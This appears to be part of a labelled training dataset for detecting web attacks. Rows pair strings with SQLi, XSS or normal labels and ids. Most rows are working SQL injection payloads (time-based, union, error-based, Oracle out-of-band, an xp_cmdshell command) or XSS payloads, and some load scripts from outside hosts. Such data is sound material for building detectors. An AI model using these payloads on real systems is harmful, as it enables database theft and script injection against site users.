"-8940"" ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ""vnuo"" like ""vnuo",2,SQLi,9985
|
657 |
+
"1"" and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ""svse"" = ""svse",2,SQLi,11251
|
658 |
+
"<source draggable=""true"" ondragleave=""alert(1)"">test</source>",1,XSS,3331
|
659 |
+
<svg><rtc onload=alert(1)></rtc>,1,XSS,9422
|
660 |
+
1' ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( 'ohqs' like 'ohqs,2,SQLi,12723
|
661 |
+
They select the best candidates.,3,normal,24465
|
662 |
+
"and (select substring(@@version,3,1))='c'",2,SQLi,19327
|
663 |
+
1 rlike sleep ( 5 ) -- muhp,2,SQLi,20890
|
664 |
+
<img id=x tabindex=1 onfocus=alert(1)></img>,1,XSS,6961
|
665 |
+
<base onpointerleave=alert(1)>XSS</base>,1,XSS,7919
|
666 |
+
"select * from users where id = 1 or 1#"" ( union select 'a',version ( ) -- 1",2,SQLi,15588
|
667 |
+
"<svg onkeyup=""alert(1)"" contenteditable>test</svg>",1,XSS,5535
|
668 |
+
"1'|| ( select 'baur' from dual where 9384 = 9384 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11385
|
669 |
+
"<style>:target {color:red;}</style><noembed id=x style=""transition:color 1s"" ontransitionend=alert(1)></noembed>",1,XSS,936
|
670 |
+
Please unban pubg and ignore the lame excuses of PTA who most important reason is youth has selected you as PM.,3,normal,26488
|
671 |
+
"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and 'lckw' = 'lckw",2,SQLi,13175
|
672 |
+
<plaintext onfocusout=alert(1) tabindex=1 id=x></plaintext><input autofocus>,1,XSS,2180
|
673 |
+
<script src=javascript:alert(1)>,1,XSS,9480
|
674 |
+
"-4028 ) where 3244 = 3244 union all select 3244,3244,3244,3244,3244,3244,3244,3244--",2,SQLi,14967
|
675 |
+
Select a gift for your loved one.,3,normal,24004
|
676 |
+
<abbr id=x tabindex=1 onbeforeactivate=alert(1)></abbr>,1,XSS,4473
|
677 |
+
-9327' ) or 3038 = 3038,2,SQLi,21332
|
678 |
+
1%' ) ) and 1651 = 9324 and ( ( '%' = ',2,SQLi,19629
|
679 |
+
<dir onpointermove=alert(1)>XSS</dir>,1,XSS,8577
|
680 |
+
"<datalist onmousemove=""alert(1)"">test</datalist>",1,XSS,6001
|
681 |
+
"<noembed ondblclick=""alert(1)"">test</noembed>",1,XSS,6665
|
682 |
+
"1' and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,12864
|
683 |
+
1 ) and 3861 = 5813--,2,SQLi,21672
|
684 |
+
<;SCRIPT SRC=//ha.ckers.org/.j>;,1,XSS,9415
|
685 |
+
"<body onkeyup=""alert(1)"" contenteditable>test</body>",1,XSS,5154
|
686 |
+
"1"" ) where 6065 = 6065 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11486
|
687 |
+
"<div draggable=""true"" ondragend=""alert(1)"">test</div>",1,XSS,4979
|
688 |
+
"{""id"":null,""name"":""Clefairy""}",3,normal,27549
|
689 |
+
"?javascript:alert(1)"",",1,XSS,9750
|
690 |
+
"<style>@keyframes x{}</style><textarea style=""animation-name:x"" onanimationstart=""alert(1)""></textarea>",1,XSS,1341
|
691 |
+
-2174' ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'dyyg' = 'dyyg,2,SQLi,12544
|
692 |
+
<BODY ONLOAD=alert(�XSS�)>,1,XSS,9675
|
693 |
+
"-4692%"" ) ) union all select 1781,1781#",2,SQLi,19641
|
694 |
+
"{""id"":null,""firstName"":""Jack"",""lastName"":""Tan"",""address"":""2276 WILTON DR, WILTON MANORS FL 33305"",""city"":""912"",""telephone"":""3524612823""}",3,normal,27185
|
695 |
+
"-7531' ) union all select 3072,3072,3072,3072,3072,3072,3072--",2,SQLi,16913
|
696 |
+
"-4745"" or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ""nifq"" like ""nifq",2,SQLi,12805
|
697 |
+
"-8080"" ) as nlos where 8917 = 8917 union all select 8917,8917,8917,8917--",2,SQLi,15851
|
698 |
+
onload=alert(1)><svg/1=',1,XSS,9723
|
699 |
+
Let's decide where to go for our family vacation.,3,normal,23920
|
700 |
+
"<style>@keyframes x{}</style><html style=""animation-name:x"" onanimationstart=""alert(1)""></html>",1,XSS,1605
|
701 |
+
"{""id"":null,""firstName"":""Lee"",""lastName"":""Shaun"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26876
|
702 |
+
<svg><x><script>alert('1')</x>,1,XSS,6760
|
703 |
+
Merge the colorful threads.,3,normal,22585
|
704 |
+
"1%' ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14983
|
705 |
+
declare @q nvarchar (4000) select @q =,2,SQLi,19660
|
706 |
+
"<multicol onclick=""alert(1)"">test</multicol>",1,XSS,6815
|
707 |
+
"1' ) ) as anaq where 9605 = 9605 and elt ( 4249 = 4249,7259 ) --",2,SQLi,16802
|
708 |
+
1 ) where 5944 = 5944 and ( 4446 = 8843 ) *8843--,2,SQLi,18595
|
709 |
+
Select a scent for your sanctuary.,3,normal,24037
|
710 |
+
"1 ) ) as acni where 6355 = 6355 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12356
|
711 |
+
"-3872%"" ) ) ) union all select 1637,1637,1637,1637,1637#",2,SQLi,17693
|
712 |
+
Select vodka.,3,normal,24518
|
713 |
+
<marquee onpointerover=alert(1)>XSS</marquee>,1,XSS,6729
|
714 |
+
Select a coffee roast for your morning cup.,3,normal,24165
|
715 |
+
"<ul draggable=""true"" ondragend=""alert(1)"">test</ul>",1,XSS,5367
|
716 |
+
"select * from users where id = '1' or ( \ ) = 1 union select 1,@@VERSION -- 1'",2,SQLi,15313
|
717 |
+
"-6363"" ) where 4043 = 4043 union all select 4043,4043,4043,4043,4043,4043,4043,4043,4043--",2,SQLi,14709
|
718 |
+
1' ) and ( 3020 = 3020 ) *6703 and ( 'rskq' = 'rskq,2,SQLi,18318
|
719 |
+
<blink id=x tabindex=1 onbeforedeactivate=alert(1)></blink><input autofocus>,1,XSS,2185
|
720 |
+
"<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>",1,XSS,1500
|
721 |
+
1'+ ( select smze where 5616 = 5616,2,SQLi,20101
|
722 |
+
Dan Nathan is a seller the Financial Select SPDR ETF.,3,normal,26253
|
723 |
+
And so how do you select who purchases your home?,3,normal,26369
|
724 |
+
"<footer ondblclick=""alert(1)"">test</footer>",1,XSS,7105
|
725 |
+
<keygen onfocusout=alert(1) tabindex=1 id=x></keygen><input autofocus>,1,XSS,2536
|
726 |
+
"-4397' ) ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ( 'omqt' = 'omqt",2,SQLi,16190
|
727 |
+
1' ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( 'hqcz' = 'hqcz,2,SQLi,14929
|
728 |
+
or WAITFOR DELAY '0:0:5'--,2,SQLi,20951
|
729 |
+
"<bdi onmouseout=""alert(1)"">test</bdi>",1,XSS,8646
|
730 |
+
-4901 ) or 3407 = 6442#,2,SQLi,21337
|
731 |
+
"select * from users where id = 1 +1 union select null,banner from v$version where rownum = 1 -- 1",2,SQLi,14247
|
732 |
+
"1' where 4701 = 4701 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,10759
|
733 |
+
Select create.,3,normal,24605
|
734 |
+
select ( case when ( 4719 = 8852 ) then 1 else 4719* ( select 4719 from master..sysdatabases ) end ) --,2,SQLi,13976
|
735 |
+
1 ) as mtnw where 7293 = 7293 and 2603 = 5764--,2,SQLi,18888
|
736 |
+
<button onBeforeCut=javascript:alert(1)>,1,XSS,8072
|
737 |
+
"1'+ ( select bldn where 8321 = 8321 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13759
|
738 |
+
Where's the beach?,3,normal,23519
|
739 |
+
1 ) ) as ojjk where 3687 = 3687 and ( 4833 = 9218 ) *9218--,2,SQLi,17305
|
740 |
+
Select a language to learn.,3,normal,24020
|
741 |
+
"<sub onclick=""alert(1)"">test</sub>",1,XSS,9292
|
742 |
+
"<center ondblclick=""alert(1)"">test</center>",1,XSS,7177
|
743 |
+
"<img ondblclick=""alert(1)"">test</img>",1,XSS,8678
|
744 |
+
"<th onbeforecopy=""alert(1)"" contenteditable>test</th>",1,XSS,4959
|
745 |
+
"{""id"":null,""name"":""shells positive""}",3,normal,27491
|
746 |
+
"1%' and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and '%' = '",2,SQLi,10845
|
747 |
+
1 ) ) as efjb where 4642 = 4642 order by 1#,2,SQLi,19233
|
748 |
+
"1'|| ( select 'jpow' from dual where 4381 = 4381 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) ||'",2,SQLi,10806
|
749 |
+
"-9896"" ) ) ) union all select 4073,4073,4073,4073,4073#",2,SQLi,17835
|
750 |
+
"<var onmouseover=""alert(1)"">test</var>",1,XSS,8333
|
751 |
+
Check conditions where possible.,3,normal,23274
|
752 |
+
stored,3,normal,23162
|
753 |
+
"iif ( 1157 = 4542,1,1/0 )",2,SQLi,21055
|
754 |
+
and,3,normal,23140
|
755 |
+
"1"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""nevr"" like ""nevr",2,SQLi,13594
|
756 |
+
"When you select it, it removes every apostrophe in the story.",3,normal,25149
|
757 |
+
"ABC<div style=""x:\xE2\x80\x8Aexpression(javascript:alert(1)"">DEF",1,XSS,2857
|
758 |
+
"1' and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and 'zetf' = 'zetf",2,SQLi,14679
|
759 |
+
"<spacer oncut=""alert(1)"" contenteditable>test</spacer>",1,XSS,4823
|
760 |
+
"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><command id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></command>",1,XSS,169
|
761 |
+
1' ) as dqgr where 2427 = 2427 and ( 3020 = 3020 ) *6703--,2,SQLi,17427
|
762 |
+
"<bdi draggable=""true"" ondragenter=""alert(1)"">test</bdi>",1,XSS,4574
|
763 |
+
"<picture onmousedown=""alert(1)"">test</picture>",1,XSS,6435
|
764 |
+
"Abstraction differs from Analysis, inasmuch as its object is to select a particular quality for consideration in itself as it is found in all the objects to which it belongs, whereas analysis considers all the qualities which belong to a single object.",3,normal,26418
|
765 |
+
<dl id=x tabindex=1 onactivate=alert(1)></dl>,1,XSS,6663
|
766 |
+
"{""id"":null,""firstName"":""Rita"",""lastName"":""Ong"",""address"":""4 B Blue Ridge Blvd"",""city"":""931"",""telephone"":""986131662""}",3,normal,27431
|
767 |
+
<animatetransform onpointerenter=alert(1)>XSS</animatetransform>,1,XSS,2925
|
768 |
+
Delete items.,3,normal,23021
|
769 |
+
"1"" ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ""kpwc"" like ""kpwc",2,SQLi,12458
|
770 |
+
1' ) as ghvi where 3880 = 3880 and 4595 = 4595#,2,SQLi,18886
|
771 |
+
Join us for dinner.,3,normal,22552
|
772 |
+
"{""id"":null,""firstName"":""Goh"",""lastName"":""Lai Chee"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27037
|
773 |
+
<legend id=x tabindex=1 onbeforeactivate=alert(1)></legend>,1,XSS,3744
|
774 |
+
"<h1 onpaste=""alert(1)"" contenteditable>test</h1>",1,XSS,5873
|
775 |
+
Draper James: 50 percent off select styles; through May 30,3,normal,26233
|
776 |
+
=+ SLEEP(5) + ',2,SQLi,9922
|
777 |
+
Select your conversation.,3,normal,24908
|
778 |
+
1 ) ) as svhd where 9761 = 9761,2,SQLi,20433
|
779 |
+
"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><video id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></video>",1,XSS,207
|
780 |
+
select ( case when ( 1275 = 7674 ) then 1275 else 1275* ( select 1275 from information_schema.character_sets ) end ) #,2,SQLi,13212
|
781 |
+
`'><script>\x20javascript:alert(536)</script>,1,XSS,6748
|
782 |
+
1 ) as fhvr where 5544 = 5544,2,SQLi,20735
|
783 |
+
1' and 7528 = 2894 and 'qoyw' = 'qoyw,2,SQLi,19820
|
784 |
+
<bdi onpointerleave=alert(1)>XSS</bdi>,1,XSS,8365
|
785 |
+
"1"" where 4652 = 4652 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14224
|
786 |
+
Select the most comfortable chair in the room.,3,normal,24042
|
787 |
+
"select * from users where id = 1 %$ 1 union select null,@@VERSION -- 1",2,SQLi,16135
|
788 |
+
"{""id"":null,""firstName"":""Rohaida"",""lastName"":""Ibrahim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27032
|
789 |
+
"<shadow onpaste=""alert(1)"" contenteditable>test</shadow>",1,XSS,4345
|
790 |
+
"1' where 2774 = 2774 union all select null,null,null,null,null#",2,SQLi,16871
|
791 |
+
-1765' ) order by 1--,2,SQLi,21592
|
792 |
+
Select a cozy nook to relax in.,3,normal,22945
|
793 |
+
"1"" ) as bllz where 6975 = 6975 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13737
|
794 |
+
<script>alert(1)<!--INJECTX,1,XSS,9658
|
795 |
+
<script>window['alert'](0)</script>,1,XSS,9150
|
796 |
+
"<dt onmouseenter=""alert(1)"">test</dt>",1,XSS,8695
|
797 |
+
"<samp onmouseover=""alert(1)"">test</samp>",1,XSS,7873
|
798 |
+
"select * from users where id = 1<@.. union select 1,version ( ) -- 1",2,SQLi,16362
|
799 |
+
Select the perfect accessory for the outfit.,3,normal,24033
|
800 |
+
or 0 = 0 #,2,SQLi,22435
|
801 |
+
"1 ) as clye where 7842 = 7842 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11651
|
802 |
+
"1%' ) ) union all select null,null,null,null,null,null,null--",2,SQLi,17092
|
803 |
+
"1"" where 4597 = 4597 rlike sleep ( 5 ) --",2,SQLi,19375
|
804 |
+
<script src=//brutelogic.com.br/1.js>,1,XSS,8742
|
805 |
+
<listing onpointerleave=alert(1)>XSS</listing>,1,XSS,6356
|
806 |
+
"1 ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 5349 = 5349",2,SQLi,10983
|
807 |
+
"<slot onmouseup=""alert(1)"">test</slot>",1,XSS,8407
|
808 |
+
"end and ( ( ""kvts"" like ""kvts",2,SQLi,20756
|
809 |
+
"-7036%' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and '%' = '",2,SQLi,10587
|
810 |
+
"1"" ) ) as gbxx where 2459 = 2459 waitfor delay '0:0:5'--",2,SQLi,17726
|
811 |
+
"<rt onbeforecopy=""alert(1)"" contenteditable>test</rt>",1,XSS,4896
|
812 |
+
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->,1,XSS,2880
|
813 |
+
"<progress onkeyup=""alert(1)"" contenteditable>test</progress>",1,XSS,3528
|
814 |
+
"or ""a""=""a",2,SQLi,22451
|
815 |
+
"<div draggable=""true"" contenteditable>drag me</div><basefont ondrop=alert(1) contenteditable>drop here</basefont>",1,XSS,898
|
816 |
+
"select * from users where id = 1 or "" ( @"" or 1 = 1 -- 1",2,SQLi,17577
|
817 |
+
<blink id=x tabindex=1 ondeactivate=alert(1)></blink><input id=y autofocus>,1,XSS,2228
|
818 |
+
Update the app.,3,normal,22882
|
819 |
+
"end and ( ( ""rqay"" like ""rqay",2,SQLi,20686
|
820 |
+
"<style>@keyframes x{}</style><samp style=""animation-name:x"" onanimationstart=""alert(1)""></samp>",1,XSS,1597
|
821 |
+
"-5391 or make_set ( 9354 = 9354,7185 ) # ptyy",2,SQLi,19039
|
822 |
+
Filter the spam messages.,3,normal,22613
|
823 |
+
Where's my missing sock?,3,normal,22560
|
824 |
+
"<ul draggable=""true"" ondragenter=""alert(1)"">test</ul>",1,XSS,4956
|
825 |
+
Select save.,3,normal,24595
|
826 |
+
"{""id"":null,""firstName"":""Kuroko"",""lastName"":""Shinzuki"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27489
|
827 |
+
"<listing onkeydown=""alert(1)"" contenteditable>test</listing>",1,XSS,3463
|
828 |
+
"<title draggable=""true"" ondragenter=""alert(1)"">test</title>",1,XSS,3691
|
829 |
+
-1603' ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'abmo' = 'abmo,2,SQLi,12523
|
830 |
+
exec master..xp_cmdshell 'net+view',2,SQLi,20008
|
831 |
+
"<! foo=""><script>alert(1)</script>"">",1,XSS,8769
|
832 |
+
Select the perfect piece of artwork.,3,normal,24073
|
833 |
+
"1"" ) ) union all select null,null,null,null,null--",2,SQLi,18519
|
834 |
+
"<style>@keyframes slidein {}</style><summary style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></summary>",1,XSS,336
|
835 |
+
"<tbody onmouseleave=""alert(1)"">test</tbody>",1,XSS,7166
|
836 |
+
"<b draggable=""true"" ondragend=""alert(1)"">test</b>",1,XSS,5813
|
837 |
+
select case when 7951 = 1147 then 1 else null end--,2,SQLi,18299
|
838 |
+
"1"" ) as awdg where 9512 = 9512",2,SQLi,20572
|
839 |
+
"<option oncontextmenu=""alert(1)"">test</option>",1,XSS,6487
|
840 |
+
"<rp onmouseover=""alert(1)"">test</rp>",1,XSS,8881
|
841 |
+
select ( case when ( 3076 = 3596 ) then 3076 else 3076* ( select 3076 from mysql.db ) end ) #,2,SQLi,14483
|
842 |
+
"<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>",1,XSS,1809
|
843 |
+
"1"" ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ""cdnc"" like ""cdnc",2,SQLi,12522
|
844 |
+
1%' ) or sleep ( 5 ) #,2,SQLi,21544
|
845 |
+
when,3,normal,23149
|
846 |
+
""" When ""CBS All Access"" appears in the search results, select it and then select ""Add Channel.",3,normal,26471
|
847 |
+
"<content draggable=""true"" ondragstart=""alert(1)"">test</content>",1,XSS,3066
|
848 |
+
<small onfocusout=alert(1) tabindex=1 id=x></small><input autofocus>,1,XSS,2637
|
849 |
+
"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6",2,SQLi,18036
|
850 |
+
"1 ) ) as queb where 2449 = 2449 union all select null,null#",2,SQLi,17329
|
851 |
+
"Select project team Work with specialist support which may include HR, equality advisers, personnel specialists, occupational psychologists, project sponsors.",3,normal,25617
|
852 |
+
<object onfocusout=alert(1) tabindex=1 id=x></object><input autofocus>,1,XSS,2543
|
853 |
+
"<frameset onScroll frameset onScroll=""javascript:javascript:alert(1)""></frameset onScroll>",1,XSS,1751
|
854 |
+
"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i",2,SQLi,11807
|
855 |
+
"-9272%"" ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""%"" = """,2,SQLi,10299
|
856 |
+
select ( case when ( 7990 = 7627 ) then 7990 else 1/ ( select 0 ) end ) --,2,SQLi,15774
|
857 |
+
Where's the astrologer?,3,normal,23656
|
858 |
+
23 or 1=1; --,2,SQLi,22260
|
859 |
+
"{""id"":null,""name"":""BaoHuckmon""}",3,normal,27063
|
860 |
+
"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,15065
|
861 |
+
">""'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>",1,XSS,130
|
862 |
+
He decided to join the yoga class next week.,3,normal,22908
|
863 |
+
"-9265"" ) or 7834 = 1685",2,SQLi,21321
|
864 |
+
"{""id"":null,""firstName"":""Sokimm"",""lastName"":""Lim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27041
|
865 |
+
"<noscript onmouseout=""alert(1)"">test</noscript>",1,XSS,6225
|
866 |
+
"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--",2,SQLi,11527
|
867 |
+
"<img src\x12=x onerror=""javascript:alert(1)"">",1,XSS,6539
|
868 |
+
<small id=x tabindex=1 ondeactivate=alert(1)></small><input id=y autofocus>,1,XSS,2222
|
869 |
+
<noframes onpointerout=alert(1)>XSS</noframes>,1,XSS,6310
|
870 |
+
"1"" ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ""xhqc"" = ""xhqc",2,SQLi,10447
|
871 |
+
Select a coffee shop to visit.,3,normal,24175
|
872 |
+
"<form id=""test"" /><button form=""test"" formaction=""javascript:javascript:alert(1)"">X",1,XSS,1907
|
873 |
+
"<A HREF=\""//google\"">XSS</A>",1,XSS,7824
|
874 |
+
select pg_sleep ( 5 ) and ( '%' = ',2,SQLi,20059
|
875 |
+
How to watch it: Tully is playing in select theaters.,3,normal,26081
|
876 |
+
1'+ ( select 'kicv' where 1976 = 1976 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) ) +',2,SQLi,9952
|
877 |
+
1 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ),2,SQLi,10059
|
878 |
+
Modify the privacy settings for your account.,3,normal,22955
|
879 |
+
"1%"" union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16626
|
880 |
+
Select your declare.,3,normal,24960
|
881 |
+
"The speaker, instead of deciding the question, submitted it to the judgment of the House, and it was ultimately referred to a select committee, which reported against Bradlaughs claim.",3,normal,25375
|
882 |
+
"<style>:target {color: red;}</style><q id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></q>",1,XSS,1252
|
883 |
+
<map onpointerup=alert(1)>XSS</map>,1,XSS,9122
|
884 |
+
"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26",2,SQLi,14900
|
885 |
+
I'll select my tuxedo.,3,normal,24366
|
886 |
+
"1'+ ( select 'fpnz' where 1592 = 1592 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) +'",2,SQLi,10894
|
887 |
+
"<script>throw onerror=eval,'=alert\x281\x29'</script>",1,XSS,4854
|
888 |
+
"1' ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( 'hbld' = 'hbld",2,SQLi,11987
|
889 |
+
"1"" ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ( ""ijag"" = ""ijag",2,SQLi,14961
|
890 |
+
"javascript://</title></textarea></style></script --><li '//"" '*/alert()/*', onclick=alert()//",1,XSS,1689
|
891 |
+
Go and select.,3,normal,24792
|
892 |
+
<x/onxxx=1,1,XSS,9848
|
893 |
+
"1%"" ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,17153
|
894 |
+
You can then select games from the menu and start playing!,3,normal,25089
|
895 |
+
"<datalist onbeforepaste=""alert(1)"" contenteditable>test</datalist>",1,XSS,2736
|
896 |
+
In 1770 a select committee met to consider policing in the Metropolis only to see their report quietly shelved.,3,normal,26030
|
897 |
+
1 or sleep ( 5 ),2,SQLi,22137
|
898 |
+
<svg/onload=alert(1),1,XSS,9763
|
899 |
+
"While some costs may be standard across the board, others will vary depending upon the agency that you select.",3,normal,25134
|
900 |
+
";!--\""<XSS>=&{()}",1,XSS,9731
|
901 |
+
1' ) where 8575 = 8575 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10680
|
902 |
+
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe,1,XSS,1133
|
903 |
+
"-8894%"" ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ""%"" = """,2,SQLi,10409
|
904 |
+
AS INJECTX WHERE 1=1 AND 1=1--,2,SQLi,20507
|
905 |
+
"<spacer ondblclick=""alert(1)"">test</spacer>",1,XSS,7201
|
906 |
+
"<object ondblclick=""alert(1)"">test</object>",1,XSS,7100
|
907 |
+
"1"" where 5927 = 5927",2,SQLi,21897
|
908 |
+
"1 ) as ahfj where 4776 = 4776 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12342
|
909 |
+
or 'one'='oneâ,2,SQLi,22191
|
910 |
+
